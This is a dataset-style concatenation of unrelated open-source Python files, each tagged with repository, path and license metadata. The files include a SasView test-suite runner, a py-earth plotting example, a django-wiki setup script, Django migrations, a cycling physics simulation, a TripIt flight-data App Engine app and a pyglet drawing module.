from MainWindow.UnitTesting import AboutBoxTest
from MainWindow.UnitTesting import DataExplorerTest
from MainWindow.UnitTesting import WelcomePanelTest
from MainWindow.UnitTesting import DroppableDataLoadWidgetTest
from MainWindow.UnitTesting import GuiManagerTest
from MainWindow.UnitTesting import MainWindowTest
## Plotting
from Plotting.UnitTesting import AddTextTest
from Plotting.UnitTesting import PlotHelperTest
from Plotting.UnitTesting import WindowTitleTest
from Plotting.UnitTesting import ScalePropertiesTest
from Plotting.UnitTesting import SetGraphRangeTest
from Plotting.UnitTesting import LinearFitTest
from Plotting.UnitTesting import PlotPropertiesTest
from Plotting.UnitTesting import PlotUtilitiesTest
from Plotting.UnitTesting import ColorMapTest
from Plotting.UnitTesting import BoxSumTest
from Plotting.UnitTesting import SlicerModelTest
from Plotting.UnitTesting import SlicerParametersTest
from Plotting.UnitTesting import PlotterBaseTest
from Plotting.UnitTesting import PlotterTest
from Plotting.UnitTesting import Plotter2DTest
from Plotting.UnitTesting import QRangeSliderTests
# Calculators
from Calculators.UnitTesting import KiessigCalculatorTest
from Calculators.UnitTesting import DensityCalculatorTest
from Calculators.UnitTesting import GenericScatteringCalculatorTest
from Calculators.UnitTesting import SLDCalculatorTest
from Calculators.UnitTesting import SlitSizeCalculatorTest
from Calculators.UnitTesting import ResolutionCalculatorPanelTest
from Calculators.UnitTesting import DataOperationUtilityTest
# Utilities
from Utilities.UnitTesting import GuiUtilsTest
from Utilities.UnitTesting import SasviewLoggerTest
from Utilities.UnitTesting import GridPanelTest
from Utilities.UnitTesting import ModelEditorTest
from Utilities.UnitTesting import PluginDefinitionTest
from Utilities.UnitTesting import TabbedModelEditorTest
from Utilities.UnitTesting import AddMultEditorTest
from Utilities.UnitTesting import ReportDialogTest
from Utilities.UnitTesting import FileConverterTest
# Unit Testing
from UnitTesting import TestUtilsTest
# Perspectives
# Fitting
from Perspectives.Fitting.UnitTesting import FittingWidgetTest
from Perspectives.Fitting.UnitTesting import FittingPerspectiveTest
from Perspectives.Fitting.UnitTesting import FittingLogicTest
from Perspectives.Fitting.UnitTesting import FittingUtilitiesTest
from Perspectives.Fitting.UnitTesting import FitPageTest
from Perspectives.Fitting.UnitTesting import FittingOptionsTest
from Perspectives.Fitting.UnitTesting import MultiConstraintTest
from Perspectives.Fitting.UnitTesting import ComplexConstraintTest
from Perspectives.Fitting.UnitTesting import ConstraintWidgetTest
# Invariant
from Perspectives.Invariant.UnitTesting import InvariantPerspectiveTest
from Perspectives.Invariant.UnitTesting import InvariantDetailsTest
# Inversion
from Perspectives.Inversion.UnitTesting import InversionPerspectiveTest
# Corfunc
from Perspectives.Corfunc.UnitTesting import CorfuncTest
def plottingSuite():
suites = (
# Plotting
unittest.makeSuite(Plotter2DTest.Plotter2DTest, 'test'),
unittest.makeSuite(PlotHelperTest.PlotHelperTest, 'test'),
unittest.makeSuite(AddTextTest.AddTextTest, 'test'),
unittest.makeSuite(WindowTitleTest.WindowTitleTest, 'test'),
unittest.makeSuite(ScalePropertiesTest.ScalePropertiesTest, 'test'),
unittest.makeSuite(SetGraphRangeTest.SetGraphRangeTest, 'test'),
unittest.makeSuite(LinearFitTest.LinearFitTest, 'test'),
unittest.makeSuite(PlotPropertiesTest.PlotPropertiesTest, 'test'),
unittest.makeSuite(PlotUtilitiesTest.PlotUtilitiesTest, 'test'),
unittest.makeSuite(ColorMapTest.ColorMapTest, 'test'),
unittest.makeSuite(BoxSumTest.BoxSumTest, 'test'),
unittest.makeSuite(SlicerModelTest.SlicerModelTest, 'test'),
unittest.makeSuite(SlicerParametersTest.SlicerParametersTest, 'test'),
unittest.makeSuite(PlotterBaseTest.PlotterBaseTest, 'test'),
unittest.makeSuite(PlotterTest.PlotterTest, 'test'),
unittest.makeSuite(QRangeSliderTests.QRangeSlidersTest, 'test'),
)
return unittest.TestSuite(suites)
def mainSuite():
suites = (
# Main window
unittest.makeSuite(DataExplorerTest.DataExplorerTest, 'test'),
unittest.makeSuite(DroppableDataLoadWidgetTest.DroppableDataLoadWidgetTest, 'test'),
unittest.makeSuite(MainWindowTest.MainWindowTest, 'test'),
unittest.makeSuite(GuiManagerTest.GuiManagerTest, 'test'),
unittest.makeSuite(AboutBoxTest.AboutBoxTest, 'test'),
unittest.makeSuite(WelcomePanelTest.WelcomePanelTest, 'test'),
)
return unittest.TestSuite(suites)
def utilitiesSuite():
suites = (
## Utilities
unittest.makeSuite(TestUtilsTest.TestUtilsTest, 'test'),
unittest.makeSuite(SasviewLoggerTest.SasviewLoggerTest, 'test'),
unittest.makeSuite(GuiUtilsTest.GuiUtilsTest, 'test'),
unittest.makeSuite(GuiUtilsTest.DoubleValidatorTest, 'test'),
unittest.makeSuite(GuiUtilsTest.HashableStandardItemTest, 'test'),
unittest.makeSuite(GridPanelTest.BatchOutputPanelTest, 'test'),
unittest.makeSuite(ModelEditorTest.ModelEditorTest, 'test'),
unittest.makeSuite(PluginDefinitionTest.PluginDefinitionTest, 'test'),
unittest.makeSuite(TabbedModelEditorTest.TabbedModelEditorTest,'test'),
unittest.makeSuite(AddMultEditorTest.AddMultEditorTest, 'test'),
unittest.makeSuite(ReportDialogTest.ReportDialogTest, 'test'),
unittest.makeSuite(FileConverterTest.FileConverterTest, 'test'),
)
return unittest.TestSuite(suites)
def calculatorsSuite():
suites = (
# Calculators
unittest.makeSuite(KiessigCalculatorTest.KiessigCalculatorTest, 'test'),
unittest.makeSuite(DensityCalculatorTest.DensityCalculatorTest, 'test'),
unittest.makeSuite(GenericScatteringCalculatorTest.GenericScatteringCalculatorTest, 'test'),
unittest.makeSuite(SLDCalculatorTest.SLDCalculatorTest, 'test'),
unittest.makeSuite(SlitSizeCalculatorTest.SlitSizeCalculatorTest, 'test'),
unittest.makeSuite(ResolutionCalculatorPanelTest.ResolutionCalculatorPanelTest, 'test'),
unittest.makeSuite(DataOperationUtilityTest.DataOperationUtilityTest, 'test'),
)
return unittest.TestSuite(suites)
def fittingSuite():
suites = (
# Perspectives
# Fitting
unittest.makeSuite(FittingPerspectiveTest.FittingPerspectiveTest, 'test'),
unittest.makeSuite(FittingWidgetTest.FittingWidgetTest, 'test'),
unittest.makeSuite(FittingLogicTest.FittingLogicTest, 'test'),
unittest.makeSuite(FittingUtilitiesTest.FittingUtilitiesTest, 'test'),
unittest.makeSuite(FitPageTest.FitPageTest, 'test'),
unittest.makeSuite(FittingOptionsTest.FittingOptionsTest, 'test'),
unittest.makeSuite(MultiConstraintTest.MultiConstraintTest, 'test'),
unittest.makeSuite(ConstraintWidgetTest.ConstraintWidgetTest, 'test'),
unittest.makeSuite(ComplexConstraintTest.ComplexConstraintTest, 'test'),
)
return unittest.TestSuite(suites)
def perspectivesSuite():
suites = (
# Invariant
unittest.makeSuite(InvariantPerspectiveTest.InvariantPerspectiveTest, 'test'),
unittest.makeSuite(InvariantDetailsTest.InvariantDetailsTest, 'test'),
# Inversion
unittest.makeSuite(InversionPerspectiveTest.InversionTest, 'test'),
# Corfunc
unittest.makeSuite(CorfuncTest.CorfuncTest, 'test'),
)
return unittest.TestSuite(suites)
def invariantPerspectiveSuite():
suites = (
# Invariant only
unittest.makeSuite(InvariantPerspectiveTest.InvariantPerspectiveTest, 'test'),
unittest.makeSuite(InvariantDetailsTest.InvariantDetailsTest, 'test'),
)
return unittest.TestSuite(suites)
def corfuncPerspectiveSuite():
suites = (
# Corfunc only
unittest.makeSuite(CorfuncTest.CorfuncTest, 'test'),
)
return unittest.TestSuite(suites)
def inversionPerspectiveSuite():
suites = (
# Inversion only
unittest.makeSuite(InversionPerspectiveTest.InversionTest, 'test'),
)
return unittest.TestSuite(suites)
if __name__ == "__main__":
user_suites = ALL_SUITES
# Check if user asked for specific suites:
if len(sys.argv) > 1:
user_suites = sys.argv[1:]
errors = {}
for suite in user_suites:
# create the suite object from name
try:
suite_instance = globals()[suite]()
result=unittest.TextTestResult(sys.stdout,True,True)
print("\nRunning %d test cases for %s"%(suite_instance.countTestCases(), suite))
result.buffer=True
suite_instance.run(result)
if not result.wasSuccessful():
if len(result.errors) or len(result.failures):
errors[suite] = (result.errors, result.failures)
if len(result.errors):
print("\n============ Errors disovered ===================")
if len(result.failures):
print("\n============ Failures disovered =================")
else:
print("\nAll tests successful")
except KeyError as ex:
print("Failure : %s "%str(ex))
print("ERROR: Incorrect suite name: %s " % suite)
pass
if len(errors.keys())>0:
for suite, errors in errors.items():
for r in errors[0]:
print("\nSuite: %s had following errors:\n %s : %s"%(suite, r[0], r[1]))
for r in errors[1]:
print("\nSuite: %s had following failures:\n %s : %s"%(suite, r[0], r[1]))
print("=================================================")
print("Exiting with error")
os._exit(1)
|
SasView/sasview
|
src/sas/qtgui/GUITests.py
|
Python
|
bsd-3-clause
| 11,242
|
"""
===========================
Plotting feature importance
===========================
A simple example showing how to compute and display
feature importances, it is also compared with the
feature importances obtained using random forests.
Feature importance is a measure of the effect of the features
on the outputs. For each feature, the values go from
0 to 1 where a higher the value means that the feature will have
a higher effect on the outputs.
Currently three criteria are supported : 'gcv', 'rss' and 'nb_subsets'.
See [1], section 12.3 for more information about the criteria.
.. [1] http://www.milbo.org/doc/earth-notes.pdf
"""
import numpy
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from pyearth import Earth
# Create some fake data
numpy.random.seed(2)
m = 10000
n = 10
X = numpy.random.uniform(size=(m, n))
y = (10 * numpy.sin(numpy.pi * X[:, 0] * X[:, 1]) +
20 * (X[:, 2] - 0.5) ** 2 +
10 * X[:, 3] +
5 * X[:, 4] + numpy.random.uniform(size=m))
# Fit an Earth model
criteria = ('rss', 'gcv', 'nb_subsets')
model = Earth(max_degree=3,
max_terms=10,
minspan_alpha=.5,
feature_importance_type=criteria,
verbose=True)
model.fit(X, y)
rf = RandomForestRegressor()
rf.fit(X, y)
# Print the model
print(model.trace())
print(model.summary())
print(model.summary_feature_importances(sort_by='gcv'))
# Plot the feature importances
importances = model.feature_importances_
importances['random_forest'] = rf.feature_importances_
criteria = criteria + ('random_forest',)
idx = 1
fig = plt.figure(figsize=(20, 10))
labels = ['$x_{}$'.format(i) for i in range(n)]
for crit in criteria:
plt.subplot(2, 2, idx)
plt.bar(numpy.arange(len(labels)),
importances[crit],
align='center',
color='red')
plt.xticks(numpy.arange(len(labels)), labels)
plt.title(crit)
plt.ylabel('importances')
idx += 1
title = '$x_0,...x_9 \sim \mathcal{N}(0, 1)$\n$y= 10sin(\pi x_{0}x_{1}) + 20(x_2 - 0.5)^2 + 10x_3 + 5x_4 + Unif(0, 1)$'
fig.suptitle(title, fontsize="x-large")
plt.show()
|
mehdidc/py-earth
|
examples/plot_feature_importance.py
|
Python
|
bsd-3-clause
| 2,142
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import os
from wiki import VERSION
from setuptools import setup, find_packages
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def get_path(fname):
return os.path.join(os.path.dirname(__file__), fname)
def read(fname):
return open(get_path(fname)).read()
requirements = [
"Django>=1.4,<1.7",
"django-sekizai>=0.7",
"Pillow",
"django-nyt>=0.9.4",
"django-mptt==0.6.0", # 0.6.1 broken: https://github.com/django-mptt/django-mptt/issues/316
"six"
]
# Requirements that depend on Django version: South and sorl-thumbnail
try:
from django import VERSION as DJANGO_VERSION
except ImportError:
# No django so assuming that a new one will get installed...
# TODO/FIXME: Remove the South req line here when Django>=1.7 is accepted
requirements.append("South>=0.8.4")
requirements.append("sorl-thumbnail>=11.12.1b")
else:
if DJANGO_VERSION < (1, 7):
requirements.append("South>=0.8.4")
if DJANGO_VERSION < (1, 5):
# For Django 1.4, use sorl-thumbnail<11.12.1:
# https://github.com/mariocesar/sorl-thumbnail/issues/255
requirements.append("sorl-thumbnail<11.12.1")
else:
requirements.append("sorl-thumbnail>=11.12.1b")
# Requirements that depend on Python version: Markdown
from sys import version_info as PYTHON_VERSION
if PYTHON_VERSION < (2, 7):
# For Python 2.6, use Markdown<2.5.0, see
# https://github.com/waylan/Python-Markdown/issues/349
requirements.append("Markdown>2.2.0,<2.5.0")
else:
requirements.append("Markdown>2.2.0")
packages = find_packages()
try:
import pypandoc
long_description = pypandoc.convert(get_path('README.md'), 'rst')
long_description = long_description.split(
'<!---Illegal PyPi RST data -->')[0]
f = open(get_path('README.rst'), 'w')
f.write(long_description)
f.close()
except (IOError, ImportError):
# No long description... but nevermind, it's only for PyPi uploads.
long_description = ""
setup(
name="wiki",
version=VERSION,
author="Benjamin Bach",
author_email="benjamin@overtag.dk",
url="http://www.django-wiki.org",
description="A wiki system written for the Django framework.",
license="GPLv3",
keywords="django wiki markdown",
packages=find_packages(exclude=["testproject", "testproject.*"]),
# long_description=long_description,
zip_safe=False,
install_requires=requirements,
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development',
'Topic :: Software Development :: Libraries :: Application Frameworks',
],
include_package_data=True,
)
|
prabhanshu/django-wiki
|
setup.py
|
Python
|
gpl-3.0
| 3,295
|
from django.core.management.base import BaseCommand, CommandError
from analytics.models import ChannelDetails
from analytics.parser import ParseChannel
class Command(BaseCommand):
def handle(self, **options):
details = ChannelDetails.objects.all()
details.delete()
obj = ParseChannel()
obj.initialize_db()
# e = True
# while e:
# obj.insert_details()
# obj.fetch_channels()
# e = obj.infinite_loop()
|
shiminsh/youtube_analytics
|
youtube/analytics/management/commands/initializedb.py
|
Python
|
mit
| 489
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 11 16:39:58 2016
用欧拉法计算自行车上下坡时的速度
@author: nightwing
"""
from math import atan,sin
import matplotlib.pyplot as plt
g = 9.8 #重力加速度(m/s2)
DENSITY = 1.29 #空气密度(kg/m3)
C = 0.5 #阻力系数
A = 0.33 #截面积(m2)
M = 70.0 #人车质量(kg)
v1 = 4.0 #(上坡)速度(m/s)
v2 = 4.0 #(下坡)速度(m/s)
P = 400.0 #功率(w)
t = 0 #初始时间
t_max = 200 #截止时间(s)
dt = 0.1 #时间间隔
time = [] #此列表存储时间
velocity1 = [] #此列表存储上坡时的速度
velocity2 = [] #此列表存储下坡时的速度
#---欧拉法计算自行车运动速度---
while t <= t_max:
velocity1.append(v1)
velocity2.append(v2)
time.append(t)
v1 += P/(M*v1)*dt-C*DENSITY*A*v1**2/(2*M)*dt-g*sin(atan(0.1))*dt
v2 += P/(M*v2)*dt-C*DENSITY*A*v2**2/(2*M)*dt+g*sin(atan(0.1))*dt
t += dt
#------------绘图---------------
plt.title("Bicycling simulation: velocity vs. time")
plt.xlabel("time (s)")
plt.ylabel("velocity (m/s)")
plt.plot(time,velocity1,"k-",label="up")
plt.plot(time,velocity2,"k--",label="down")
plt.legend(loc=5)
plt.show()
|
WuShichao/computational-physics
|
2/2_4/2_4.py
|
Python
|
gpl-3.0
| 1,243
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('ideascale', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('ideascale_id', models.IntegerField()),
('name', models.CharField(max_length=100)),
('email', models.EmailField(max_length=254)),
],
),
migrations.CreateModel(
name='Campaign',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('ideascale_id', models.IntegerField()),
('name', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('ideascale_id', models.IntegerField()),
('text', models.TextField()),
('datetime', models.CharField(max_length=50)),
('positive_votes', models.IntegerField()),
('negative_votes', models.IntegerField(null=True)),
('comments', models.IntegerField(null=True)),
('parent_type', models.CharField(max_length=50)),
('parent_id', models.IntegerField(max_length=50)),
('url', models.URLField()),
],
),
migrations.CreateModel(
name='Idea',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('ideascale_id', models.IntegerField()),
('title', models.CharField(max_length=100)),
('text', models.TextField()),
('datetime', models.CharField(max_length=50)),
('positive_votes', models.IntegerField()),
('negative_votes', models.IntegerField(null=True)),
('comments', models.IntegerField(null=True)),
('url', models.URLField()),
('campaign', models.ForeignKey(to='ideascale.Campaign')),
],
),
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('country', models.CharField(max_length=50)),
('city', models.CharField(max_length=50)),
('latitude', models.FloatField()),
('longitude', models.FloatField()),
],
),
migrations.CreateModel(
name='Vote',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('ideascale_id', models.IntegerField()),
('value', models.IntegerField()),
('datetime', models.CharField(max_length=50)),
('author', models.ForeignKey(to='ideascale.Author')),
('idea', models.ForeignKey(to='ideascale.Idea')),
],
),
migrations.AlterField(
model_name='initiative',
name='name',
field=models.CharField(max_length=100),
),
migrations.AddField(
model_name='idea',
name='location',
field=models.ForeignKey(to='ideascale.Location'),
),
migrations.AddField(
model_name='idea',
name='user',
field=models.ForeignKey(to='ideascale.Author'),
),
migrations.AddField(
model_name='comment',
name='location',
field=models.ForeignKey(to='ideascale.Location'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(to='ideascale.Author'),
),
]
|
rebearteta/social-ideation
|
ideascale/migrations/0002_auto_20150424_1736.py
|
Python
|
mit
| 4,257
|
import unittest
import utils
# O(nlog(n)) time. O(1) space. Greedy.
class Solution:
def smallestRangeII(self, a, k):
"""
:type a: List[int]
:type k: int
:rtype: int
"""
a.sort()
result = a[-1] - a[0]
for i in range(0, len(a) - 1):
result = min(result, max(a[-1] - k, a[i] + k) - min(a[0] + k, a[i + 1] - k))
return result
class Test(unittest.TestCase):
def test(self):
cases = utils.load_test_json(__file__).test_cases
for case in cases:
args = str(case.args)
actual = Solution().smallestRangeII(**case.args.__dict__)
self.assertEqual(case.expected, actual, msg=args)
if __name__ == '__main__':
unittest.main()
|
chrisxue815/leetcode_python
|
problems/test_0910.py
|
Python
|
unlicense
| 768
|
'''OpenGL extension EXT.blend_equation_separate
This module customises the behaviour of the
OpenGL.raw.GL.EXT.blend_equation_separate to provide a more
Python-friendly API
Overview (from the spec)
EXT_blend_func_separate introduced separate RGB and alpha blend
factors. EXT_blend_minmax introduced a distinct blend equation for
combining source and destination blend terms. (EXT_blend_subtract &
EXT_blend_logic_op added other blend equation modes.) OpenGL 1.4
integrated both functionalities into the core standard.
While there are separate blend functions for the RGB and alpha blend
factors, OpenGL 1.4 provides a single blend equation that applies
to both RGB and alpha portions of blending.
This extension provides a separate blend equation for RGB and alpha
to match the generality available for blend factors.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/blend_equation_separate.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.EXT.blend_equation_separate import *
### END AUTOGENERATED SECTION
|
D4wN/brickv
|
src/build_data/windows/OpenGL/GL/EXT/blend_equation_separate.py
|
Python
|
gpl-2.0
| 1,198
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import csv
from collections import defaultdict
import webapp2
from webapp2_extras import json
from google.appengine.api import taskqueue
from google.appengine.ext import ndb
import config
from tripit_facade import TripItFacade
AIRPORTS_ID = 1
MATRIX_ID = 2
class BlobModel(ndb.Model):
payload = ndb.PickleProperty(compressed=True)
@classmethod
def by_name(cls, name_value):
return cls.query(name=name_value)
class HomeHandler(webapp2.RequestHandler):
def get(self):
template_values = {}
template = config.JINJA_ENVIRONMENT.get_template('views/home.html')
self.response.write(template.render(template_values))
class AirportListHandler(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'application/csv'
airports = BlobModel.get_by_id(AIRPORTS_ID)
colors = ['#AF81C9', '#F89A7E', '#F2CA85', '#54D1F1', '#7C71AD', '#445569']
writer = csv.writer(self.response.out)
writer.writerow(['name', 'color'])
for i, value in enumerate(airports.payload):
writer.writerow([value, colors[i % len(colors)]])
class AirportMatrixHandler(webapp2.RequestHandler):
def get(self):
self.response.content_type = 'application/json'
matrix = BlobModel.get_by_id(MATRIX_ID)
self.response.write(json.encode(matrix.payload))
class RawHandler(webapp2.RequestHandler):
def get(self):
tripit = TripItFacade(config.TRIPIT_USERNAME, config.TRIPIT_PASSWORD)
flight_segments = tripit.list_flight_segments()
if len(flight_segments) > 0:
self.response.content_type = 'application/json'
self.response.write(json.encode(flight_segments))
class TripItHandler(webapp2.RequestHandler):
def get(self):
logging.info('Scheduling tripit fetch')
taskqueue.add(url='/tripit/worker')
def post(self):
tripit = TripItFacade(config.TRIPIT_USERNAME, config.TRIPIT_PASSWORD)
flight_segments = tripit.list_flight_segments()
logging.info('Flight segments retrieved!')
airports = set()
matrix = defaultdict(int)
for s in flight_segments:
origin, destination = s['start_airport_code'], s['end_airport_code']
matrix[origin, destination] += 1
airports.add(origin)
airports.add(destination)
airports = list(airports) # to guarantee order
weights = []
for i in airports:
current_line = [0] * len(airports)
for j, value in enumerate(airports):
current_line[j] = matrix[i, value]
weights.append(current_line)
if len(weights) > 0:
tripit_airport = BlobModel(id=AIRPORTS_ID, payload=airports)
tripit_airport.put()
tripit_matrix = BlobModel(id=MATRIX_ID, payload=weights)
tripit_matrix.put()
logging.info('Updated datastore entries with matrix and airport information')
else:
logging.error('Ignoring datastore update due to missing information, check log for errors')
app = webapp2.WSGIApplication([
('/', HomeHandler),
('/airports/matrix.json', AirportMatrixHandler),
('/airports/list.csv', AirportListHandler),
('/tripit/schedule', TripItHandler),
('/tripit/worker', TripItHandler),
('/tripit/raw', RawHandler)
], debug=True)
|
mcascallares/hand-luggage
|
main.py
|
Python
|
apache-2.0
| 4,034
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from tempest_lib.cli import base
class ClientTestBase(base.ClientTestBase):
"""This is a first pass at a simple read only python-heatclient test.
This only exercises client commands that are read only.
This should test commands:
* as a regular user
* as a admin user
* with and without optional parameters
* initially just check return codes, and later test command outputs
"""
def _get_clients(self):
cli_dir = os.environ.get(
'OS_HEATCLIENT_EXEC_DIR',
os.path.join(os.path.abspath('.'), '.tox/functional/bin'))
return base.CLIClient(
username=os.environ.get('OS_USERNAME'),
password=os.environ.get('OS_PASSWORD'),
tenant_name=os.environ.get('OS_TENANT_NAME'),
uri=os.environ.get('OS_AUTH_URL'),
cli_dir=cli_dir)
def heat(self, *args, **kwargs):
return self.clients.heat(*args, **kwargs)
|
ecerulm/python-heatclient
|
heatclient/tests/functional/base.py
|
Python
|
apache-2.0
| 1,527
|
from expy import shared
from expy.colors import *
from expy.io import sendTrigger
np = shared.np
math = shared.math
def getPos(x=shared.win_width // 2, y=shared.win_height // 2, w=0, h=0, anchor_x='center', anchor_y='center'):
'''
Caluate the screen position of object
Parameters
----------
x: float or int (default: shared.win_width // 2)
If x is float, it represents the x-offset(-1~1 scale) from the object benchmark to the screen center,
if int, it represents the x-offset(pixel) from the object benchmark to the screen upperleft.
y: float or int (default: shared.win_height // 2)
Similar with x
w: float or int (default: 0)
If w is float, it represents the width scale on screen,
if int, it represents the width in pixel.
h: float or int (default: 0)
Similar with x
anchor_x: str (default:'center')
The position benchmark on this object to the given x.
Options: 'center', 'left', or 'right'.
anchor_y: str (default:'center')
The position benchmark on this object to the given y.
Options: 'center', 'top', or 'bottom'.
Returns
-------
(x, y): (int, int)
The position of the object's lowerleft corner
'''
if type(x) is float:
x = (0.5 + x / 2) * shared.win_width
if type(y) is float:
y = (0.5 + y / 2) * shared.win_height
if w < 1:
w = w * shared.win_width
if h < 1:
h = h * shared.win_height
if anchor_x == 'center':
x = x - w / 2
elif anchor_x == 'right':
x = x - w
elif anchor_x == 'left':
x = x
else:
raise ValueError('Unsupported position benchmark')
if anchor_y == 'center':
y = y - h / 2
elif anchor_y == 'top':
y = y - h
elif anchor_y == 'bottom':
y = y
else:
raise ValueError('Unsupported position benchmark')
if w>0:
return int(x), int(y), int(w), int(h)
else:
return int(x), int(y)
def drawText(text, font=shared.default_font, size='stim_font_size', color=C_white, rotation=0, x=0.0, y=0.0, anchor_x='center', anchor_y='center', show_now=True, display=True, timeit=False, trigger=None):
'''
Draw text with complex format on the canvas. The text will show as multiple lines splited by the '\n'.
Parameters
----------
text: str
The content of text.
font: str (default: shared.default_font)
The font name of text.
size:int, or str (default: 'stim_font_size')
The font size of text, you can either use a number or a pre-defined number name.
color: RGB tuple, or pre-defined variable (default:'C_white')
The font color of text, you can either use an RGB value or a pre-defined color name.
The pre-defined colors include C_black, C_white, C_red, C_lime, C_blue, C_yellow, C_aqua, C_fuchsia, C_silver, C_gray, C_maroon, C_olive, C_green, C_purple, C_teal, C_navy.
rotation: int (default: 0)
The rotation angle of text.
x: int, or float (default: 0.0)
The x coordinate of text. If x is int, the coordinate would be pixel number to the left margin of screen; If x is float (-1~1), the coordinate would be percentage of half screen to the screen center.
y: int, or float (default: 0.0)
The y coordinate of text. If y is int, the coordinate would be pixel number to the upper margin of screen; If y is float (-1~1), the coordinate would be percentage of half screen to the screen center.
anchor_x: str (default: 'center')
The position benchmark on this object to the given x.
Options: 'center', 'left', or 'right'.
anchor_y: str (default: 'center')
The position benchmark on this object to the given y.
Options: 'center', 'top', or 'bottom'.
show_now: True(default), False
If True, the function will put the canvas onto the screen immediately (with a potential delay);
otherwise, the canvas will be put until `show` function.
(beta testing) trigger: (content, mode)
(beta testing) timeit: True, False (default)
Returns
-------
(width, height): Width and height of the text sprite
'''
if display==False:
show_now = False
print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
'Assign value'
if (type(size) is str) and (size in shared.font):
size = shared.font[size]
elif (type(size) is int) and (size > 0):
pass
else:
raise ValueError(str(size) + ' cannot be regarded as a font size')
x, y = getPos(x, y)
'Draw'
if not '\n' in text:
label = shared.pyglet.text.Label(text,
color=color,
font_name=font, font_size=size,
x=x, y=y,
anchor_x=anchor_x, anchor_y=anchor_y)
label.draw()
else:
lines = text.split('\n')
row_spacing = 0.5 # 0.5x row spacing
y_offset_all = - ((1 + row_spacing) * len(lines) -
row_spacing) * size / 2
for ind, target in enumerate(lines):
y_offset = y_offset_all + (1 + row_spacing) * ind * size
label = shared.pyglet.text.Label(target,
color=color,
font_name=font, font_size=size,
x=x, y=y - y_offset,
anchor_x=anchor_x, anchor_y=anchor_y)
label.draw()
if show_now:
shared.win.flip()
if timeit and not shared.start_tp:
now = shared.time.time()
shared.start_tp = now
if trigger:
sendTrigger(trigger[0], mode=trigger[1])
shared.need_update = False
else:
shared.need_update = True
return label.content_width, label.content_height
def drawRect(w, h, x=0.0, y=0.0, fill=True, color=C_white, width=1, anchor_x='center', anchor_y='center', show_now=True, display=True, timeit=False, trigger=None):
'''
Draw rectangle on the canvas.
Parameters
----------
w: float or int (default: 0)
The width of rectangle.
If w is float, it represents the width scale on screen,
if int, it represents the width in pixel.
h: float or int (default: 0)
The height of rectangle.
Similar with x.
x: int, or float (default:0.0)
The x coordinate of rectangle.
If x is int, the coordinate would be pixel number to the left margin of screen;
If x is float (-1~1), the coordinate would be percentage of half screen to the screen center.
y: int, or float (default:0.0)
The y coordinate of rectangle.
If y is int, the coordinate would be pixel number to the upper margin of screen;
If y is float (-1~1), the coordinate would be percentage of half screen to the screen center.
fill: True(default), False
Whether to fill out the blank in rectangle
color: RGB tuple, or pre-defined variable (default:'C_white')
The font color of text, you can either use an RGB value or a pre-defined color name.
The pre-defined colors include C_black, C_white, C_red, C_lime, C_blue, C_yellow, C_aqua, C_fuchsia, C_silver, C_gray, C_maroon, C_olive, C_green, C_purple, C_teal, C_navy.
width: int (default: 1)
The width of each line
anchor_x: str (default:'center')
The position benchmark on this object to the given x.
Options: 'center', 'left', or 'right'.
anchor_y: str (default:'center')
The position benchmark on this object to the given y.
Options: 'center', 'top', or 'bottom'.
show_now: True(default), False
If True, the function will put the canvas onto the screen.
(beta testing) trigger: (content, mode)
(beta testing) timeit: True, False (default)
Returns
-------
None
'''
if display==False:
show_now = False
print('WARNING: The "display" will be deprecated in future version. Please use "show_now" instead')
x, y, w, h = getPos(x, y, w=w, h=h, anchor_x='center', anchor_y='center')
points = [x, y, x + w, y, x + w, y + h, x, y + h]
if fill:
shared.pyglet.graphics.draw_indexed(4, shared.gl.GL_TRIANGLES,
[0, 1, 2, 0, 2, 3],
('v2i', points),
('c4B', color * 4)
)
else:
shared.pyglet.gl.glLineWidth(width)
shared.pyglet.graphics.draw(5, shared.gl.GL_LINE_LOOP,
('v2i', points + points[:2]),
('c4B', color * 5)
)
if show_now:
shared.win.flip()
